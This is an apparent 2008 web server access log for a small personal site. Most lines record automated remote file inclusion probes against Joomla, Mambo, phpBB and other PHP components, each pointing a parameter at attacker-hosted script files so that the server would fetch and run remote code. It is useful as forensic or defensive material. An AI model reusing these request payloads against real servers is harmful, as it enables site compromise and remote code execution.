67.195.98.217 - - [02/Jul/2008:23:49:09 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.61.37.254 - - [02/Jul/2008:23:52:37 -0500] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.kvcwesterlo.be/themes/phpkaox/images/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
69.61.37.254 - - [02/Jul/2008:23:52:37 -0500] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.kvcwesterlo.be/themes/phpkaox/images/id.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
87.106.98.71 - - [02/Jul/2008:23:53:33 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
87.106.98.71 - - [02/Jul/2008:23:53:33 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
89.188.110.30 - - [02/Jul/2008:23:53:41 -0500] "GET /logs//?pag=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 200 89857 "-""libwww-perl/5.805"
89.188.110.30 - - [02/Jul/2008:23:53:41 -0500] "GET //?pag=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.188.110.30 - - [02/Jul/2008:23:55:45 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
89.188.110.30 - - [02/Jul/2008:23:55:45 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
86.59.80.71 - - [02/Jul/2008:23:56:29 -0500] "GET /logs/?mosConfig_absolute_path=http://www.kvcwesterlo.be/themes/phpkaox/images/id.txt? HTTP/1.1" 200 89852 "-""libwww-perl/5.79"
86.59.80.71 - - [02/Jul/2008:23:56:29 -0500] "GET /?mosConfig_absolute_path=http://www.kvcwesterlo.be/themes/phpkaox/images/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
200.30.73.117 - - [02/Jul/2008:23:56:43 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
200.30.73.117 - - [02/Jul/2008:23:56:44 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
60.240.249.194 - - [02/Jul/2008:23:57:23 -0500] "GET //costume/costume1.htm HTTP/1.1" 200 4913 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
213.35.225.138 - - [02/Jul/2008:23:58:44 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
213.35.225.138 - - [02/Jul/2008:23:58:44 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
87.239.10.63 - - [02/Jul/2008:23:59:23 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://medisana.co.kr/test?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
87.239.10.63 - - [02/Jul/2008:23:59:23 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://medisana.co.kr/test?? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
213.35.225.138 - - [02/Jul/2008:23:59:59 -0500] "GET /logs//?pag=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 89857 "-""libwww-perl/5.805"
213.35.225.138 - - [02/Jul/2008:23:59:59 -0500] "GET //?pag=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
87.106.101.24 - - [03/Jul/2008:00:00:13 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
87.106.101.24 - - [03/Jul/2008:00:00:13 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
87.239.10.63 - - [03/Jul/2008:00:01:52 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://medisana.co.kr/test?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
87.239.10.63 - - [03/Jul/2008:00:01:52 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://medisana.co.kr/test?? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
87.106.101.24 - - [03/Jul/2008:00:02:10 -0500] "GET /logs//?pag=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 89857 "-""libwww-perl/5.805"
87.106.101.24 - - [03/Jul/2008:00:02:10 -0500] "GET //?pag=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
195.47.67.242 - - [03/Jul/2008:00:02:41 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
195.47.67.242 - - [03/Jul/2008:00:02:44 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
195.47.67.242 - - [03/Jul/2008:00:02:46 -0500] "GET //appserv/main.php?appserv_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
151.1.32.226 - - [03/Jul/2008:00:04:08 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:04:09 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
204.15.135.138 - - [03/Jul/2008:00:05:13 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://s18gh.net/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.811"
204.15.135.138 - - [03/Jul/2008:00:05:13 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://s18gh.net/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
74.6.18.227 - - [03/Jul/2008:00:05:25 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.227 - - [03/Jul/2008:00:05:26 -0500] "GET /logs/access_log.1210550400 HTTP/1.0" 200 517304 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.149.95.15 - - [03/Jul/2008:00:05:47 -0500] "GET /logs//component/option,com_facileforms/Itemid,238//components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 383 "-""libwww-perl/5.79"
83.149.95.15 - - [03/Jul/2008:00:05:47 -0500] "GET //component/option,com_facileforms/Itemid,238//components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.79"
87.106.98.71 - - [03/Jul/2008:00:05:56 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
87.106.98.71 - - [03/Jul/2008:00:05:57 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
213.35.225.138 - - [03/Jul/2008:00:05:57 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
213.35.225.138 - - [03/Jul/2008:00:05:57 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
89.188.110.30 - - [03/Jul/2008:00:06:24 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
89.188.110.30 - - [03/Jul/2008:00:06:27 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
151.1.32.226 - - [03/Jul/2008:00:07:12 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:07:12 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:07:12 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:07:13 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:09:31 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:09:32 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 359 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:09:43 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:09:43 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 359 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:09:44 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:09:45 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 359 "-""libwww-perl/5.803"
200.30.73.117 - - [03/Jul/2008:00:10:27 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
200.30.73.117 - - [03/Jul/2008:00:10:27 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
87.106.101.24 - - [03/Jul/2008:00:11:35 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
87.106.101.24 - - [03/Jul/2008:00:11:35 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
59.106.19.213 - - [03/Jul/2008:00:12:57 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?contact=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
59.106.19.213 - - [03/Jul/2008:00:12:58 -0500] "GET //components/com_thopper/inc/contact_type.php?contact=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
151.1.32.226 - - [03/Jul/2008:00:12:59 -0500] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:13:00 -0500] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
59.106.19.213 - - [03/Jul/2008:00:13:02 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?contact=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
59.106.19.213 - - [03/Jul/2008:00:13:02 -0500] "GET //components/com_thopper/inc/contact_type.php?contact=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
38.99.44.104 - - [03/Jul/2008:00:21:20 -0500] "GET /tattoo HTTP/1.0" 301 318 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
151.1.32.226 - - [03/Jul/2008:00:26:46 -0500] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:26:46 -0500] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:28:54 -0500] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:28:55 -0500] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
67.18.241.90 - - [03/Jul/2008:00:31:24 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 346 "-""libwww-perl/5.812"
67.18.241.90 - - [03/Jul/2008:00:31:24 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
202.221.143.111 - - [03/Jul/2008:00:34:05 -0500] "GET /logs//include.php?path[docroot]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
202.221.143.111 - - [03/Jul/2008:00:34:06 -0500] "GET //include.php?path[docroot]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.65"
151.1.32.226 - - [03/Jul/2008:00:35:34 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:35:35 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
204.15.135.138 - - [03/Jul/2008:00:38:35 -0500] "GET /logs/!scanhttp://s18gh.net/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
204.15.135.138 - - [03/Jul/2008:00:38:35 -0500] "GET /!scanhttp://s18gh.net/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
204.15.135.138 - - [03/Jul/2008:00:38:42 -0500] "GET /logs/!scanhttp://s18gh.net/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
204.15.135.138 - - [03/Jul/2008:00:38:42 -0500] "GET /!scanhttp://s18gh.net/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
151.1.32.226 - - [03/Jul/2008:00:39:42 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:39:42 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:40:18 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
151.1.32.226 - - [03/Jul/2008:00:40:18 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
74.53.178.146 - - [03/Jul/2008:00:40:56 -0500] "GET /logs/access_log.1194048000/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://h1.ripway.com/disconnectgrupo/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.79"
74.53.178.146 - - [03/Jul/2008:00:40:56 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://h1.ripway.com/disconnectgrupo/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
74.53.178.146 - - [03/Jul/2008:00:40:56 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://h1.ripway.com/disconnectgrupo/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
65.55.208.124 - - [03/Jul/2008:00:41:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [03/Jul/2008:00:41:12 -0500] "GET /artwork/tombio.htm HTTP/1.1" 404 302 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
193.254.241.12 - - [03/Jul/2008:00:41:24 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
193.254.241.12 - - [03/Jul/2008:00:41:24 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
193.254.241.12 - - [03/Jul/2008:00:41:26 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
193.254.241.12 - - [03/Jul/2008:00:41:26 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
87.230.35.101 - - [03/Jul/2008:00:41:52 -0500] "GET /logs/mcf.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
87.230.35.101 - - [03/Jul/2008:00:41:53 -0500] "GET /mcf.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
211.58.255.95 - - [03/Jul/2008:00:41:59 -0500] "GET /logs/access_log.1181952000/faqsupport/samplefaqsupport.php?path[docroot]=http://www.sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
211.58.255.95 - - [03/Jul/2008:00:41:59 -0500] "GET /logs/access_log.1181952000/faqsupport/samplefaqsupport.php?path[docroot]=http://www.sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
211.58.255.95 - - [03/Jul/2008:00:41:59 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
211.58.255.95 - - [03/Jul/2008:00:41:59 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
211.58.255.95 - - [03/Jul/2008:00:42:00 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://www.sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
211.58.255.95 - - [03/Jul/2008:00:42:00 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://www.sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
211.58.255.95 - - [03/Jul/2008:00:42:35 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://www.sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
211.58.255.95 - - [03/Jul/2008:00:42:37 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://www.sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
67.170.127.210 - - [03/Jul/2008:00:45:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
87.230.35.101 - - [03/Jul/2008:00:47:30 -0500] "GET /logs/mcf.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
87.230.35.101 - - [03/Jul/2008:00:47:30 -0500] "GET /mcf.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
216.134.212.103 - - [03/Jul/2008:00:49:19 -0500] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
216.134.212.103 - - [03/Jul/2008:00:49:19 -0500] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
216.134.212.103 - - [03/Jul/2008:00:49:22 -0500] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
216.134.212.103 - - [03/Jul/2008:00:49:22 -0500] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
67.195.37.168 - - [03/Jul/2008:00:57:57 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.168 - - [03/Jul/2008:00:57:57 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://www.ringsworld.com/history/5.html""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.149.95.15 - - [03/Jul/2008:00:58:02 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
83.149.95.15 - - [03/Jul/2008:00:58:02 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.195.37.168 - - [03/Jul/2008:01:02:10 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.99.44.104 - - [03/Jul/2008:01:03:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
202.60.73.133 - - [03/Jul/2008:01:05:20 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
202.60.73.133 - - [03/Jul/2008:01:05:20 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
38.99.44.104 - - [03/Jul/2008:01:05:35 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.0" 200 3085 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
74.55.19.242 - - [03/Jul/2008:01:08:31 -0500] "GET /login.aspx?Returnhttp://www.geocities.com/coprald/scan/xxx.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
205.234.240.98 - - [03/Jul/2008:01:11:24 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
205.234.240.98 - - [03/Jul/2008:01:11:24 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
193.254.241.12 - - [03/Jul/2008:01:11:41 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
193.254.241.12 - - [03/Jul/2008:01:11:41 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
193.254.241.12 - - [03/Jul/2008:01:11:43 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
193.254.241.12 - - [03/Jul/2008:01:11:43 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
72.55.165.116 - - [03/Jul/2008:01:12:02 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.165.116 - - [03/Jul/2008:01:12:02 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
